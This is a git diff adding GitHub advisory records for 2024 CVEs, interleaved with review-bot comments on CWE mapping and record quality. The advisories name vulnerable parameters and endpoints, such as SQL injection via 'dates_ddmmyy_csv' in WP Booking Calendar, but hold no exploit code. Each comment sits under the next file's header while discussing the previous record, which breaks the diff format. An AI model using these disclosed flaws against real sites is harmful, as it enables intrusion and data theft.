+ "url": "https://plugins.trac.wordpress.org/changeset/3029928/essential-addons-for-elementor-lite/tags/5.9.8/assets/front-end/js/view/wrapper-link.js"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/875db71d-c799-40b9-95e1-74d53046b0a9?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json b/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json
new file mode 100644
index 0000000000000..16076e9dfe15d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-382c-wf23-2vph/GHSA-382c-wf23-2vph.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-382c-wf23-2vph",
+ "modified": "2024-02-08T21:30:34Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2024-24388"
+ ],
+ "details": "Cross-site scripting (XSS) vulnerability in XunRuiCMS versions v4.6.2 and before, allows remote attackers to obtain sensitive information via crafted malicious requests to the background login.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24388"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cnblogs.com/rxtycc/p/17948379"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json b/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json
new file mode 100644
index 0000000000000..766ee760a878e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3938-2cj5-r45m/GHSA-3938-2cj5-r45m.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3938-2cj5-r45m",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22779"
+ ],
+ "details": "Directory Traversal vulnerability in Kihron ServerRPExposer v.1.0.2 and before allows a remote attacker to execute arbitrary code via the loadServerPack in ServerResourcePackProviderMixin.java.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22779"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Kihron/ServerRPExposer/commit/8f7b829df633f59e828d677f736c53652d6f1b8f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed"
+ },
+ {
+ "type": "WEB",
+ "url": "https://modrinth.com/mod/serverrpexposer"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json
new file mode 100644
index 0000000000000..cc81f5d110af6
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-39f6-9c52-27p8",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2023-31002"
+ ],
+ "details": "IBM Security Access Manager Container 10.0.0.0 through 10.0.6.1 temporarily stores sensitive information in files that could be accessed by a local user. IBM X-Force ID: 254657.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254657"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json
new file mode 100644
index 0000000000000..bcd3831a5a6c3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3c3r-6mf2-xcmp",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-24013"
+ ],
+ "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass crafted offset, limit, and sort parameters to perform SQL injection via /novel/pay/list",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24013"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/201206030/novel-plus"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24013.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json b/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json
new file mode 100644
index 0000000000000..7f49e787b2f38
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3c4g-j683-8mx6/GHSA-3c4g-j683-8mx6.json
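Review bot: `cwe_ids` is empty although `details` plainly describes SQL injection through the offset, limit and sort parameters, so `"cwe_ids": ["CWE-89"]` is warranted. Both severity fields are empty because no CVSS vector has been assigned, which is fine as-is, but the only technical reference is a text file in a personal GitHub repository (`cxcxcxcxcxcxcxc`), so the claim should be verified against the project before the advisory is marked reviewed. `affected` is empty even though novel-plus is a GitHub-hosted project; if it is published to a supported ecosystem, an affected range should be added.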
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3c4g-j683-8mx6",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-1072"
+ ],
+ "details": "The Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the seedprod_lite_new_lpage function in all versions up to, and including, 6.15.21. This makes it possible for unauthenticated attackers to change the contents of coming-soon, maintenance pages, login and 404 pages set up with the plugin. Version 6.15.22 addresses this issue but introduces a bug affecting admin pages. We suggest upgrading to 6.15.23.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1072"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3029567/coming-soon/trunk/app/lpage.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78d7920b-3e20-43c7-a522-72bac824c2cb?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json b/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json
new file mode 100644
index 0000000000000..6341cf598f800
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3f42-7384-7vpr/GHSA-3f42-7384-7vpr.json
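Review bot: `cwe_ids` is empty although `details` attributes the issue to a missing capability check, which maps to `"cwe_ids": ["CWE-862"]`. The description also records that 6.15.22 fixes the issue but introduces a functional bug and recommends 6.15.23; if an `affected` range is added later, `fixed` should be 6.15.22 (the version that closes the vulnerability), with the 6.15.23 recommendation kept in the text.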
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3f42-7384-7vpr",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-48793"
+ ],
+ "details": "Zoho ManageEngine ADAudit Plus through 7250 allows SQL Injection in the aggregate report feature.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48793"
+ },
+ {
+ "type": "WEB",
+ "url": "https://manageengine.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:16Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json b/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json
new file mode 100644
index 0000000000000..2f013a0ecc060
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3gg6-vc2p-3m85/GHSA-3gg6-vc2p-3m85.json
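Review bot: `cwe_ids` is empty although `details` describes SQL injection, so `"cwe_ids": ["CWE-89"]` applies; the `https://manageengine.com` reference is a bare vendor homepage and adds nothing over the `sqlfix-7271.html` page. The same fix page is cited by the CVE-2024-0269 record later in this diff, which says builds 7270 and below are affected, while this record says "through 7250"; the two affected ranges should be checked against the vendor page so that they agree.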
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3gg6-vc2p-3m85",
+ "modified": "2024-02-08T12:30:48Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2024-24880"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24880"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/apollo13-framework-extensions/wordpress-apollo13-framework-extensions-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T12:15:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json b/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json
new file mode 100644
index 0000000000000..f380d5aa55bf5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3gjv-wq7v-458m/GHSA-3gjv-wq7v-458m.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3gjv-wq7v-458m",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-22331"
+ ],
+ "details": "IBM UrbanCode Deploy (UCD) 7.0 through 7.0.5.19, 7.1 through 7.1.2.15, 7.2 through 7.2.3.8, 7.3 through 7.3.2.3, and IBM UrbanCode Deploy (UCD) - IBM DevOps Deploy 8.0.0.0 could disclose sensitive user information when installing the Windows agent. IBM X-Force ID: 279971.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22331"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279971"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7114131"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json b/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json
new file mode 100644
index 0000000000000..cfb212801456d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3j3m-xc65-2xvg/GHSA-3j3m-xc65-2xvg.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3j3m-xc65-2xvg",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0969"
+ ],
+ "details": "The ARMember plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's \"Default Restriction\" feature and view restricted post content.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0969"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ea4e6718-4e1e-44ce-8463-860f0d3d80f5?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json b/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json
new file mode 100644
index 0000000000000..acb8821c3b32e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3jx4-3grj-xm5w/GHSA-3jx4-3grj-xm5w.json
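Review bot: `cwe_ids` is empty although `details` describes restricted post content being exposed to unauthenticated callers through the REST API; `"cwe_ids": ["CWE-200"]` is the obvious classification, and CWE-862 may also apply if the referenced Wordfence entry frames it as a missing authorization check. The PR:N/C:L vector is consistent with the text.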
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3jx4-3grj-xm5w",
+ "modified": "2024-02-07T15:30:47Z",
+ "published": "2024-02-07T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22021"
+ ],
+ "details": "Vulnerability CVE-2024-22021 allows a Veeam Recovery Orchestrator user with a low privileged role (Plan Author) to retrieve plans from a Scope other than the one they are assigned to. \n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22021"
+ },
+ {
+ "type": "WEB",
+ "url": "https://veeam.com/kb4541"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json b/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json
new file mode 100644
index 0000000000000..6b5d04124de0f
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3mj6-hq84-85g9/GHSA-3mj6-hq84-85g9.json
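Review bot: `cwe_ids` is empty although `details` describes a low-privileged user reading plans outside their assigned Scope, which is an authorization bypass; `"cwe_ids": ["CWE-285"]` (or CWE-639 if the Veeam KB describes it as an insecure direct reference to a plan) should be confirmed. The `score` uses a `CVSS:3.0` prefix while every other record in this batch uses 3.1; that is valid under `CVSS_V3`, but worth checking against the vendor KB rather than assuming it is not a transcription slip. The `details` string also ends in a stray space and newline.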
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3mj6-hq84-85g9",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33076"
+ ],
+ "details": "Memory corruption in Core when updating rollback version for TA and OTA feature is enabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33076"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json b/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json
new file mode 100644
index 0000000000000..9941cd576ad4c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3mpj-wgvw-fw9v/GHSA-3mpj-wgvw-fw9v.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3mpj-wgvw-fw9v",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2024-24303"
+ ],
+ "details": "SQL Injection vulnerability in HiPresta \"Gift Wrapping Pro\" (hiadvancedgiftwrapping) module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue() method.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24303"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.friendsofpresta.org/modules/2024/02/06/hiadvancedgiftwrapping.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T09:15:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json b/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json
new file mode 100644
index 0000000000000..b9946acdd5bff
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3mwh-2gfv-6wv5/GHSA-3mwh-2gfv-6wv5.json
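Review bot: `cwe_ids` is empty although `details` names an SQL injection in addGiftWrappingCartValue(), so `"cwe_ids": ["CWE-89"]` applies. No CVSS vector is recorded, so both severity fields are empty; that is acceptable, but the referenced FriendsOfPresta write-up should be checked for a vector before the advisory is reviewed, since the text claims both privilege escalation and data exposure through a front controller.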
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3mwh-2gfv-6wv5",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2024-21851"
+ ],
+ "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause heap overflow through integer overflow.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21851"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-190"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json b/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json
new file mode 100644
index 0000000000000..5d0e2c391aa0d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3mxj-h7pr-364q/GHSA-3mxj-h7pr-364q.json
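Review bot: The `details` string begins with a newline and a lowercase "in", so the subject of the sentence (which component is affected) is missing and the grammar is broken ("allow a local attacker cause heap overflow"); it should read along the lines of `"details": "OpenHarmony v4.0.0 and prior versions allow a local attacker to cause a heap overflow through an integer overflow."`, with the component name restored if the gitee disclosure page gives one. CWE-190 is recorded; since the stated consequence is a heap overflow, CWE-122 could be added as the resulting weakness. The C:N/I:L/A:N vector is unusually low for a heap overflow and is worth confirming against the OpenHarmony disclosure.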
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3mxj-h7pr-364q",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2023-42765"
+ ],
+ "details": "\n\n\n\n\n\n\n\n\nAn attacker with access to the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"username\" parameter in the SNMP configuration.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42765"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json b/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json
new file mode 100644
index 0000000000000..458b73501a5cb
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3p6h-jm8p-g7p5/GHSA-3p6h-jm8p-g7p5.json
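Review bot: The `details` string starts with nine newline characters and never names the affected vendor or product, so as written the record does not say which software has the SNMP-configuration XSS; the leading whitespace should be stripped and the product named from the referenced CISA advisory (icsa-24-023-04). CWE-79 and the AV:A/S:C vector are consistent with a stored XSS in a device web UI, so the classification itself looks right.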
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3p6h-jm8p-g7p5",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T00:31:28Z",
+ "aliases": [
+ "CVE-2024-21866"
+ ],
+ "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product responds back with an error message containing sensitive data if it receives a specific malformed request.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21866"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rapidscada.org/contact/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-209"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T00:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json b/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json
new file mode 100644
index 0000000000000..8b66bb0bdaed0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3pj6-pjjw-252j/GHSA-3pj6-pjjw-252j.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3pj6-pjjw-252j",
+ "modified": "2024-02-08T09:30:39Z",
+ "published": "2024-02-08T09:30:39Z",
+ "aliases": [
+ "CVE-2024-1207"
+ ],
+ "details": "The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1207"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032596%40booking&new=3032596%40booking&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7802ed1f-138c-4a3d-916c-80fb4f7699b2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T09:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json b/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json
new file mode 100644
index 0000000000000..e340748f4c1fa
--- /dev/null
